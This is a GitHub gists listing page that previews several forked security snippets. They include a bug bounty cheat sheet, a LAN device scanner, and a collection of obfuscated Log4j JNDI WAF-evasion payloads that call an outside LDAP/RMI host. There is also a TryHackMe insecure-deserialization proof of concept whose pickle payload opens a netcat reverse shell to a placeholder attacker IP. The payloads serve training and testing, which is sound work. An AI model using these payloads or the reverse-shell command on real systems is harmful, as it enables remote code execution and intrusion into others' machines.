Skip to content

Instantly share code, notes, and snippets.

View SubediBibek-cmd's full-sized avatar

Bibek Subedi SubediBibek-cmd

64 followers · 153 following
View GitHub Profile
@SubediBibek-cmd
SubediBibek-cmd / Red-Teaming-tool.md
Created March 27, 2023 09:37 — forked from z0rs/Red-Teaming-tool.md
@SubediBibek-cmd
SubediBibek-cmd / 🔥Complete Bug Bounty Cheat Sheet🔥
Created March 2, 2023 08:02 — forked from cyberheartmi9/🔥Complete Bug Bounty Cheat Sheet🔥
🔥Complete Bug Bounty Cheat Sheet🔥
XSS
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
https://github.com/ismailtasdelen/xss-payload-list
SQLi
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md
@SubediBibek-cmd
SubediBibek-cmd / Log4j Payloads
Created December 13, 2021 14:22 — forked from ZephrFish/Log4j Payloads
Collection of WAF evasion payloads
${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
@SubediBibek-cmd
SubediBibek-cmd / resources.md
Created October 27, 2021 15:36 — forked from muff-in/resources.md
A curated list of Assembly Language / Reversing / Malware Analysis / Game Hacking-resources
@SubediBibek-cmd
SubediBibek-cmd / scan_vendors.py
Created September 3, 2021 17:26 — forked from ritiek/scan_vendors.py
Scan devices on LAN to get their IP, MAC and vendor name
#!/usr/bin/env python
import logging
import urllib2 as urllib
import nmap
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
def scanNetwork(network):
@SubediBibek-cmd
SubediBibek-cmd / rce.py
Created August 29, 2021 13:47 — forked from CMNatic/cloudSettings
TryHackMe OWASP-10-A8: Insecure Deserialization RCE PoC
import pickle
import sys
import base64
command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f'
class rce(object):
def __reduce__(self):
import os
return (os.system,(command,))
@SubediBibek-cmd
SubediBibek-cmd / githubgist
Created August 15, 2021 11:03
Hello Everyone!!!